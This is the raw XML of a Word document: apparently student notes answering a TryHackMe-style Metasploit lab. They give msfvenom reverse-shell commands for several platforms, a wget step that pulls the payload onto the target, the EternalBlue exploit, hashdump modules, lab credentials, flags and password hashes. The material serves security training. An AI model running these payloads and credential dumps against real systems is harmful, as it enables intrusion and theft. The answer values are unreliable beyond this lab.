          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command supports a number of options that will help you manage sessions better.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>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Questions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1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">What is the content of the flag.txt file?</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Answer : use exploit :- exploit/windows/smb/ms17-010-eternalblue</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Set RHOST and LHOST and exploit  : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">THM-5455554845</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2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">What is the NTLM hash of the password of the user "pirate"?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Answer : use hashdump : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">8ce9a3ebd1647fcc5e04025019f4b875</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6)MSFVENOM :</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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Msfvenom will allow you to access all payloads available in the  Metasploit framework. Msfvenom allows you to create payloads in many different formats (PHP, exe, dll, elf, etc.) and for many different target systems (Apple, Windows, Android, Linux, etc.).</w:t>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OUTPUT FORMATS : </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ab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The msfvenom --list formats command can be used to list supported output formats</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HANDLER : </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rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Multi handler supports all Metasploit payloads and can be used for Meterpreter as well as regular shells.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OTHER PAYLOADS :</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1)Linux Executable and Linkable Format (elf)</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf &gt; rev_shell.elf</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Elf is comparable with .exe . Once you get target machine shell you have to set permissions chmod +x rev_shell.elf.</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2)Windows :</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color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe &gt; rev_shell.exe</w:t>
        <w:b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rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">3)</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PHP</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw &gt; rev_shell.php</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4)ASP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="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rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp &gt; rev_shell.asp</w:t>
        <w:b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rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="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rPr>
        <w:t xml:space="preserve">5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Python</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw &gt; rev_shell.py</w:t>
      </w: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t xml:space="preserve">Question 1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Launch the VM attached to this task. The username is murphy, and the  password is 1q2w3e4r. You can connect via SSH or launch this machine in  the browser. Once on the terminal, type "sudo su" to get a root shell,  this will make things easier.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use command : ssh murphy@&lt;target-ip&gt; . Login with pass : 1q2w3e4r</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2)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Create a meterpreter payload in the .elf format (on the AttackBox, or your attacking machine of choice).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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf &gt; rev_shell.elf</w:t>
      </w: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In that LHOST type you machine ip and listening port.</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3)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Transfer it to the target machine (you can start a Python web server on  your attacking machine with the python3 -m http.server 9000 command and  use wget http://ATTACKING_MACHINE_IP:9000/shell.elf to download it to  the target machine).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In your machine start listner use command : python3 –m http.server 9000 and in your target machine use command to download payload : wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tooltip="http://&lt;your" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="872"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">http://&lt;your</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">-machine-ip&gt;:9000/shell.elf </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4)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Get a meterpreter session on the target machine.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you have to do in msfconsole : use exploit/multi/handler module</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1)use linux/x86/meterpreter/reverse_tcp module to get shell : set </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">linux/x86/meterpreter/reverse_tcp</w:t>
      </w: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2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">set LHOST and LPORT </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3)exploit</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You get a meterpreter shell.</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t xml:space="preserve">5)Use a post exploitation module to dump hashes of other users on the system.</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in meterpreter shell, if hashdump is not working use module : post/linux/gather/hashdump</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In that module :</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1)set session &lt;id - session&gt;</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2)exploit</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6)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">What is the other user's password hash?</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0</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spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>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0" w:left="0"/>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ight="0" w:firstLine="0" w:left="0"/>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firstLine="0" w:left="0"/>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firstLine="708" w:left="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:footnotePr/>
      <w:endnotePr/>
      <w:type w:val="nextPage"/>
      <w:pgSz w:h="15840" w:orient="portrait" w:w="12240"/>
      <w:pgMar w:top="1440" w:right="5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6"/>
    <w:next w:val="886"/>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6"/>
    <w:next w:val="886"/>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6"/>
    <w:next w:val="886"/>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6"/>
    <w:next w:val="886"/>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6"/>
    <w:next w:val="886"/>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6"/>
    <w:next w:val="886"/>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6"/>
    <w:next w:val="886"/>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6"/>
    <w:next w:val="886"/>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6"/>
    <w:next w:val="886"/>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6"/>
    <w:next w:val="886"/>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6"/>
    <w:next w:val="886"/>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6"/>
    <w:next w:val="886"/>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6"/>
    <w:next w:val="886"/>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6"/>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6"/>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6"/>
    <w:next w:val="886"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0e2841" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="866">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="886"/>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6"/>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6"/>
    <w:next w:val="886"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="875">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="886"/>
    <w:next w:val="886"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="876">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="886"/>
    <w:next w:val="886"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="877">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="886"/>
    <w:next w:val="886"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="660"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="878">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="886"/>
    <w:next w:val="886"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="880"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="879">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="886"/>
    <w:next w:val="886"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="1100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="880">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="886"/>
    <w:next w:val="886"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="1320"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="881">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="886"/>
    <w:next w:val="886"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="1540"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="882">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="886"/>
    <w:next w:val="886"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="1760"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="883">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="836"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="666666"/>
    </w:r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lt;you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2025-10-14T04:57:50Z</dcterms:modified>
</cp:coreProperties>
</file>